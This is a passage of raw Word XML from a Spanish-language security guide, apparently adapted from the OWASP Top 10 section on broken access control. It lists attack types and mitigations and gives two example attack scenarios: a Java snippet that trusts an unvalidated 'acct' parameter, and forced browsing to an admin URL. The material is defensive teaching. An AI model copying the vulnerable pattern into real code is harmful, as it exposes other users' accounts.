                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Permitir que la clave primaria se cambie a la de otro usuario, pudiendo ver o edit</w:t>
            </w:r>
            <w:r w:rsidR="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ar la cuenta de otra persona.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171B63" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Elevación de privilegios. Actuar como un usuario sin iniciar sesión, o actuar como un administrador habiendo iniciado </w:t>
            </w:r>
            <w:r w:rsidR="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sesión como usuario estándar.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00171B63" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Manipulación de metadatos, como reproducir un token de control de acceso JWT (JSON Web Token),  manipular una cookie o un campo oculto para elevar los privilegios, o abusar de la invalidación de tokens JWT.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00171B63" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">La configuración incorrecta de CORS permite el acceso no autorizado a una API. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00171B63" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Forzar la navegación a páginas autenticadas como un usuario no autenticado o a páginas privilegiadas como usuario estándar. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00171B63">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00171B63">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Acceder a una API sin control de acceso mediante el uso de verbos POST, PUT y DELETE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="004F71AF" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El control de acceso sólo es efectivo si es aplicado del lado del servidor o en Server-less API, donde el atacante no puede modificar la verificación de control de acceso o los metadatos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Con la excepción de los recursos públicos, la política debe ser denegar de forma predeterminada. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Implemente los mecanismos de control de acceso una vez y reutilícelo en toda la aplicación, incluyendo minimizar el control de acceso HTTP (CORS). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Los controles de acceso al modelo deben imponer la propiedad (dueño) de los registros, en lugar de aceptar que el usuario puede crear, leer, actualizar o eliminar cualquier registro. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Los modelos de dominio deben hacer cumplir los requisitos exclusivos de los límites de negocio de las aplicaciones. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Deshabilite el listado de directorios del servidor web y asegúrese que los metadatos/fuentes de archivos (por ejemplo de GIT) y copia de seguridad no estén presentes en las carpetas públicas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Registre errores de control de acceso y alerte a los administradores cuando corresponda (por ej. fallas reiteradas). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Limite la tasa de acceso a las APIs para minimizar el daño de herramientas de ataque automatizadas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los tokens JWT deben ser invalidados luego de la finalización de la sesión por parte del usuario.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los desarrolladores y el personal de QA deben incluir pruebas de control de acceso en sus pruebas unitarias y de integración.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00966575" w:rsidRPr="00912EEA" w:rsidRDefault="00966575" w:rsidP="00966575">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:ind w:left="720"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00966575">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Escenario #1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00966575">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> La aplicación utiliza datos no validados en una llamada SQL para acceder a información de una cuenta:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">pstmt.setString(1, </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>request.getParameter("acct")</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ResultSet results = pstmt.executeQuery( );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00966575" w:rsidRDefault="00912EEA" w:rsidP="00966575">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00966575">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Un atacante simplemente puede modificar el parámetro “acct” en el navegador y enviar el número de cuenta que desee. Si no se verifica correctamente, el atacante puede acceder a la cuenta de cualquier usuario.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00966575">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #2: </w:t>
            </w:r>
            <w:r w:rsidRPr="00966575">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Un atacante simplemente fuerza las búsquedas en las URL. Los privilegios de administrador son necesarios para acceder a la ´página de administración.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">http://example.com/app/getappInfo </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http://example.com/app/</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">admin_getappInfo </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00966575" w:rsidRDefault="00912EEA" w:rsidP="00966575">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00966575">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Si un usuario no autenticado puede acceder a cualquier página o, si un usuario no-administrador puede acceder a la ´página de administración, esto es una falla.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002570A2" w:rsidRDefault="002570A2" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002570A2" w:rsidRPr="00912EEA" w:rsidRDefault="002570A2" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="002570A2" w:rsidRDefault="002570A2" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2605B559" wp14:editId="440AE2CA">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-64770</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>281</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1267002" cy="838317"/>
                  <wp:effectExtent l="0" t="0" r="9525"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44BC0B.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId84">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1267002" cy="838317"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Configuración de Seguridad Incorrecta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="002570A2" w:rsidRDefault="00DD6C07" w:rsidP="002570A2">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70AB267D" wp14:editId="70F071B5">
                  <wp:simplePos x="0" y="0"/>
